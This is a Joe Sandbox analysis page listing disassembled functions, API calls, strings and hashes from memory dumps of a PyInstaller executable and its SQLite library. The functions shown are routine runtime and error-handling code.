Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: bce30d106d1aea433b574043196e7eeaa4ab3af65bd301622a4049b2291cccd5
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: 0C213231A08B5282FA549B68E8152EE63A6FF84780F4444B5EF4DD3B96DF3CD945C740

Function 00007FF6BA3BB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB2D7
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB30D
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB33A
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB34B
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB35C
SetLastError.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB377

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
Instruction ID: 0c4e4368a6ac04a6a1af16ef9cc7cac7a12af766748610e59176326dbeec837e
Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
Instruction Fuzzy Hash: 6A112C20F0CE5282FA58AB6D965113D62439F84BB0F9447B4EF7EC76D6EE2CE8418700

Function 00007FFDFB118C10 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB118E2D
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB118EFC
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB118FFC

Strings

%Q%s, xrefs: 00007FFDFB118F62
"%w" , xrefs: 00007FFDFB118CBB

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: "%w" $%Q%s
API String ID: 2142204133-1987291987
Opcode ID: 807366cecbe9e0301ba750eb4c07066faa31d7482fa8457f33c96b331545aa71
Instruction ID: f671e69857532605f18261b6b9a722e6677316873901ea063ae87d02a3f7623d
Opcode Fuzzy Hash: 807366cecbe9e0301ba750eb4c07066faa31d7482fa8457f33c96b331545aa71
Instruction Fuzzy Hash: 0EC1DF22B0AA8395EB14CB15E4A0A7967A4FB45BA8F449235DE7E477F8CF3CE444C300

Function 00007FFDFB0E1040 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0E1317
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0E1385

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0E10C2
database corruption, xrefs: 00007FFDFB0E10CE
%s at line %d of [%.10s], xrefs: 00007FFDFB0E10DA

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2142204133-3727861699
Opcode ID: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
Instruction ID: eccdc27b8a4b265c9c387bd0d289337288d4b9b3859fbc6e61e5a473e0bbf354
Opcode Fuzzy Hash: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
Instruction Fuzzy Hash: 35A12773B0E2D285D7248B1994A0ABE7F92FB81785F044236DBAA837D9DE3CE055D710

Function 00007FFDFB117CA0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB117EAE
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB117F19

Strings

virtual tables may not be altered, xrefs: 00007FFDFB117D38
Cannot add a column to a view, xrefs: 00007FFDFB117D54
sqlite_altertab_%s, xrefs: 00007FFDFB117E6D

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 2142204133-2063813899
Opcode ID: 6f3502865f2554c3b22856db225aa2943b439a183bdfd32a53b0fa553fb1f819
Instruction ID: 35adcc33fad65c82aadbef9ac98b24261718a8aad9d9cedd5704d31b9fc77bf0
Opcode Fuzzy Hash: 6f3502865f2554c3b22856db225aa2943b439a183bdfd32a53b0fa553fb1f819
Instruction Fuzzy Hash: AB91A1A3F0AB8682EB50CB11D420ABA77A5FB49B88F455235DE6D477EADF38D444C300

Function 00007FFDFB0EB070 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFB0E98B0: 00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0E991D
Part of subcall function 00007FFDFB0E98B0: 00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0E9944

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0EB2F3
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0EB309

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB0EB117
database corruption, xrefs: 00007FFDFB0EB130
%s at line %d of [%.10s], xrefs: 00007FFDFB0EB137

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2142204133-3727861699
Opcode ID: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
Instruction ID: d69f32acc4cba28de20126764065014e3801a3a0430501e13121f07a1fa256e6
Opcode Fuzzy Hash: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
Instruction Fuzzy Hash: BF81E036B0968286E7608F25D0A4BAE77A1FB4A7C4F048036EB5D477E9DF38D446D700

Function 00007FF6BA3A2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6BA3A1B6A), ref: 00007FF6BA3A295E

Strings

%s: %s, xrefs: 00007FF6BA3A29E8
[PYI-%d:ERROR] , xrefs: 00007FF6BA3A2966
Error, xrefs: 00007FF6BA3A2A0E
Error [ANSI Fallback], xrefs: 00007FF6BA3A29FF

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 6474216541e73cee04d5bea2235dbcdb92cf0d66e3b4a33291c267952bf03734
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 3C31D422B19B9552EB209B69E8406EA6396BF887D4F404136FF8DC3759EF7CD586C300

Function 00007FF6BA3A2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6BA3A23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6BA3A248E
DeleteObject.GDI32 ref: 00007FF6BA3A24C1
DestroyIcon.USER32 ref: 00007FF6BA3A24D3

Strings

Unhandled exception in script, xrefs: 00007FF6BA3A23F8

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction ID: abcc867859b592937e0a5fb97efe447c81b924d8ac483f2989db55483e6c5155
Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction Fuzzy Hash: 5C315B32A19A9289EB20DF69E8552F96361FF88788F840175EF4DC7B59EF3CD1448700

Function 00007FF6BA3A2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6BA3A918F,?,00007FF6BA3A3C55), ref: 00007FF6BA3A2BA0
MessageBoxW.USER32 ref: 00007FF6BA3A2C2A

Strings

Warning, xrefs: 00007FF6BA3A2C1D
[PYI-%d:%ls] , xrefs: 00007FF6BA3A2BA8
WARNING, xrefs: 00007FF6BA3A2BAF

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 6bb14bf5cdbc8b869888d2abea2137adcdb3eb0d78b61a92b002b37a9e8c5c41
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: 2421AE62708B5182EB10DB69F8847EA73A5FB88780F404136EF8DD766AEE3CD245C740

Function 00007FF6BA3A2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6BA3A1B99), ref: 00007FF6BA3A2760

Strings

[PYI-%d:%s] , xrefs: 00007FF6BA3A2768
Error, xrefs: 00007FF6BA3A27DE
Error [ANSI Fallback], xrefs: 00007FF6BA3A27CF
ERROR, xrefs: 00007FF6BA3A276F

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: 650c7e43aba7845dd66f312a8e6f45dc3742a53488683232eb456c3364033eab
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 0F21A132A19B9182E720DB59F8807EA6394FB88380F400132FF8CC3659EF7CD1858740

Function 00007FF6BA3B9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6BA3B9AAD
GetProcAddress.KERNEL32 ref: 00007FF6BA3B9AC3
FreeLibrary.KERNEL32 ref: 00007FF6BA3B9AEA

Strings

CorExitProcess, xrefs: 00007FF6BA3B9ABC
mscoree.dll, xrefs: 00007FF6BA3B9AA4

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: bbe89f6377486ddb835e3b164c8dda79f18224af875dd38484ef08f2c7db0ed2
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 7CF06D61B09B1691EA108F28E89577A6321FF897A1F940375DF6EC62E4EF2CD489C300

Function 00007FF6BA3C9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6BA3C9390
_set_statfp.LIBCMT ref: 00007FF6BA3C93AB
_set_statfp.LIBCMT ref: 00007FF6BA3C93C7
_set_statfp.LIBCMT ref: 00007FF6BA3C9403

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 7aceca4c67f259a8ea055f5cda5efb5388b7b723a3c09b52805fce967372f75b
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: AA118F26E5CB2311FA64116EECB237D1250AF593A0E0706B4FF6ED63DAAF6CA9414300

Function 00007FF6BA3BB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3AF
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3CE
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB3F6
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB407
FlsSetValue.KERNEL32(?,?,?,00007FF6BA3BA5A3,?,?,00000000,00007FF6BA3BA83E,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BB418

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
Instruction ID: 5107153a3523f70bccd5f3a3d828954c4bae41eeb6ba1abaea3632cffcdc22a4
Opcode Fuzzy Hash: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
Instruction Fuzzy Hash: 30116320F0CE4281FA589B6D96512796143AF447B0FD853B4EF7DC66D6DE2CF8418300

Function 00007FF6BA3BB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6BA3BB235
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB254
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB27C
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB28D
FlsSetValue.KERNEL32 ref: 00007FF6BA3BB29E

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
Instruction ID: 9aa9ffdd5bc88ab497d3b89d8a464cfdb7345b19c087d9fb5c3e39bcf37f5cbd
Opcode Fuzzy Hash: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
Instruction Fuzzy Hash: 2F110920F0CE0786F968AA6D695117E11434F85770F9857B8DF3ECA6D2DD2DB8419311

Function 00007FF6BA3B5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B5FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B6106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B61BC

Strings

verbose, xrefs: 00007FF6BA3B5FB0

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: f311c9e24136a87dee3d19148c0fc7a5b38b122ddf6625ef5a4b908f65c372a8
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 15919A32A09E4681FB658E29D45037E76A6AB40B94F844276DF5EC73E7DF3CE8858301

Function 00007FFDFB10D3D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB107847), ref: 00007FFDFB10D52A
00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB107847), ref: 00007FFDFB10D554
00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB107847), ref: 00007FFDFB10D5A7

Strings

H, xrefs: 00007FFDFB10D53E

Memory Dump Source

